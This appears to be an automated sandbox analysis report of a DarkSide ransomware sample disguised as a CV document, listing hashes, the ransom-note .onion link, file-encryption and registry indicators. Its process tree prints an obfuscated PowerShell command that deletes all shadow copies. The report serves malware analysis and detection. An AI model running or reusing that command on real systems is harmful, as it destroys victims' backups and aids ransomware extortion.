Analysis
-
max time kernel
120s -
max time network
172s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
29-07-2021 19:42
Static task
static1
Behavioral task
behavioral1
Sample
CV_MickoE.doc.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
CV_MickoE.doc.exe
Resource
win10v20210408
General
-
Target
CV_MickoE.doc.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
C:\\README.341d6443.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
CV_MickoE.doc.exedescription ioc process File renamed C:\Users\Admin\Pictures\TestUnprotect.png => C:\Users\Admin\Pictures\TestUnprotect.png.341d6443 CV_MickoE.doc.exe File renamed C:\Users\Admin\Pictures\ClearRename.tif => C:\Users\Admin\Pictures\ClearRename.tif.341d6443 CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\ClearRename.tif.341d6443 CV_MickoE.doc.exe File renamed C:\Users\Admin\Pictures\JoinEdit.png => C:\Users\Admin\Pictures\JoinEdit.png.341d6443 CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\TestUnprotect.png.341d6443 CV_MickoE.doc.exe File renamed C:\Users\Admin\Pictures\UnprotectPush.crw => C:\Users\Admin\Pictures\UnprotectPush.crw.341d6443 CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\UnprotectPush.crw.341d6443 CV_MickoE.doc.exe File renamed C:\Users\Admin\Pictures\GrantSave.png => C:\Users\Admin\Pictures\GrantSave.png.341d6443 CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\GrantSave.png.341d6443 CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\JoinEdit.png.341d6443 CV_MickoE.doc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" CV_MickoE.doc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" CV_MickoE.doc.exe -
Modifies Control Panel 1 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" CV_MickoE.doc.exe -
Modifies registry class 5 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 CV_MickoE.doc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" CV_MickoE.doc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon CV_MickoE.doc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 CV_MickoE.doc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" CV_MickoE.doc.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeCV_MickoE.doc.exepid process 828 powershell.exe 828 powershell.exe 1048 CV_MickoE.doc.exe 1048 CV_MickoE.doc.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
CV_MickoE.doc.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1048 CV_MickoE.doc.exe Token: SeSecurityPrivilege 1048 CV_MickoE.doc.exe Token: SeTakeOwnershipPrivilege 1048 CV_MickoE.doc.exe Token: SeLoadDriverPrivilege 1048 CV_MickoE.doc.exe Token: SeSystemProfilePrivilege 1048 CV_MickoE.doc.exe Token: SeSystemtimePrivilege 1048 CV_MickoE.doc.exe Token: SeProfSingleProcessPrivilege 1048 CV_MickoE.doc.exe Token: SeIncBasePriorityPrivilege 1048 CV_MickoE.doc.exe Token: SeCreatePagefilePrivilege 1048 CV_MickoE.doc.exe Token: SeBackupPrivilege 1048 CV_MickoE.doc.exe Token: SeRestorePrivilege 1048 CV_MickoE.doc.exe Token: SeShutdownPrivilege 1048 CV_MickoE.doc.exe Token: SeDebugPrivilege 1048 CV_MickoE.doc.exe Token: SeSystemEnvironmentPrivilege 1048 CV_MickoE.doc.exe Token: SeRemoteShutdownPrivilege 1048 CV_MickoE.doc.exe Token: SeUndockPrivilege 1048 CV_MickoE.doc.exe Token: SeManageVolumePrivilege 1048 CV_MickoE.doc.exe Token: 33 1048 CV_MickoE.doc.exe Token: 34 1048 CV_MickoE.doc.exe Token: 35 1048 CV_MickoE.doc.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeBackupPrivilege 1344 vssvc.exe Token: SeRestorePrivilege 1344 vssvc.exe Token: SeAuditPrivilege 1344 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
CV_MickoE.doc.exedescription pid process target process PID 1048 wrote to memory of 828 1048 CV_MickoE.doc.exe powershell.exe PID 1048 wrote to memory of 828 1048 CV_MickoE.doc.exe powershell.exe PID 1048 wrote to memory of 828 1048 CV_MickoE.doc.exe powershell.exe PID 1048 wrote to memory of 828 1048 CV_MickoE.doc.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CV_MickoE.doc.exe"C:\Users\Admin\AppData\Local\Temp\CV_MickoE.doc.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD59d2be1f0f2dff24f07d6948f3e088b79
SHA1f630d1b2643bc73de7b9a2568361bd9ff3de8589
SHA256402afc9911a9449dc4a8eedaeaf56ec45d760e729fb284439dd35874b11914a2
SHA51260ff053163aa730d38401419c12c974b932e2ba895a09cc0b8e88044374a15e2812d832a7d1bdc60507256abf9b1153b8ddd92e68a5c052ad4988bc5708a1c6b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD50a022dd6003ec62309682321c6228e88
SHA1efa01ec1772d1dba6f1131830aca60aa8ed11a06
SHA2560fbadd511eaa7bab9f1430c2c66ee16170da2e58e582aa879b5b1c85085d6663
SHA512001e810984af3b5abfeb97fff5f6a9499883ac6d5ac72674cafbdbc4125e90ced73338a5d357713931496c1239e278ea7fbba44ec04063fc31a3e5978049db25